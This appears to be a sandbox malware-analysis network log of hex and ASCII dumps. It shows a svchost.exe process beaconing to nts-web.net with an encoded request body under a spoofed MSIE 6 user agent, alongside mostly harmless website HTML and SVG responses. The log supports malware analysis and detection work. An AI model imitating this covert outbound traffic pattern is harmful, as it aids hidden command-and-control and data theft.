                                                                                                                                                                                                                                                                          2023-07-05 06:07:29 UTC1747INData Raw: 2d 69 74 65 6d 2d 31 36 20 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 35 38 20 61 63 74 20 66 69 72 73 74 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 48 6f 6d 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e
                                                                                                                                                                                                                                                                          Data Ascii: -item-16 current_page_item menu-item-54058 act first"><a href='https://dataform.co.uk/' data-level='1'><span class="menu-item-text"><span class="menu-text">Home</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page men
                                                                                                                                                                                                                                                                          2023-07-05 06:07:29 UTC1755INData Raw: 38 2a 31 30 30 30 3b 76 61 72 20 64 69 66 66 6d 73 3d 28 6e 6f 77 2d 67 6d 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3b 63 3d 63 2e 72 65 70 6c 61 63 65 28 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 2f 2c 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 27 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f
                                                                                                                                                                                                                                                                          Data Ascii: 8*1000;var diffms=(now-gmt);</script><script type="text/javascript">var c=document.body.className;c=c.replace(/woocommerce-no-js/,'woocommerce-js');document.body.className=c;</script><script type='text/javascript' src='https://dataform.co.uk/wp-co


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          25192.168.2.65514649.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:31 UTC1760OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: nts-web.net
                                                                                                                                                                                                                                                                          Content-Length: 5448
                                                                                                                                                                                                                                                                          2023-07-05 06:07:31 UTC1760OUTData Raw: 32 43 34 53 72 6d 68 77 63 33 56 33 65 58 78 2b 67 59 53 47 69 49 71 4e 6a 35 48 61 48 37 35 79 79 41 6b 64 63 72 45 45 6a 79 61 48 53 39 4c 4d 6c 39 50 56 57 49 48 6a 6d 66 71 5a 51 51 67 33 6f 57 61 4f 53 79 2f 71 42 36 39 72 4b 5a 77 72 35 4b 6c 55 4c 30 4e 54 39 72 51 38 46 50 42 62 54 68 36 2b 33 56 4d 73 43 4e 56 4a 67 66 6a 50 42 43 76 70 41 79 66 53 4e 4a 67 34 58 70 2f 77 65 41 4d 50 79 58 35 30 76 38 46 47 4e 6c 52 66 50 6c 6d 6c 4e 64 72 65 62 2f 68 7a 48 5a 78 36 48 71 47 35 39 30 48 46 41 66 44 46 65 47 54 65 58 4f 6e 32 41 41 54 54 65 33 73 73 37 50 79 74 39 72 2b 35 67 35 54 5a 73 79 47 59 6d 58 4e 6a 69 45 57 45 47 75 49 58 54 51 2b 56 2b 77 6d 65 38 4e 58 78 2b 37 49 68 57 4d 42 73 35 76 5a 4b 47 66 57 53 59 79 4f 48 66 4a 73 5a 63 44 36
                                                                                                                                                                                                                                                                          Data Ascii: 2C4Srmhwc3V3eXx+gYSGiIqNj5HaH75yyAkdcrEEjyaHS9LMl9PVWIHjmfqZQQg3oWaOSy/qB69rKZwr5KlUL0NT9rQ8FPBbTh6+3VMsCNVJgfjPBCvpAyfSNJg4Xp/weAMPyX50v8FGNlRfPlmlNdreb/hzHZx6HqG590HFAfDFeGTeXOn2AATTe3ss7Pyt9r+5g5TZsyGYmXNjiEWEGuIXTQ+V+wme8NXx+7IhWMBs5vZKGfWSYyOHfJsZcD6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1765INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:31 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 2599149
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                          ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1765INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1781INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                          Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1797INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                                          Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1813INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1829INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1829INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                                          Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1845INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1861INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1877INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:32 UTC1893INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC1909INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC1925INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC1941INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC1957INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
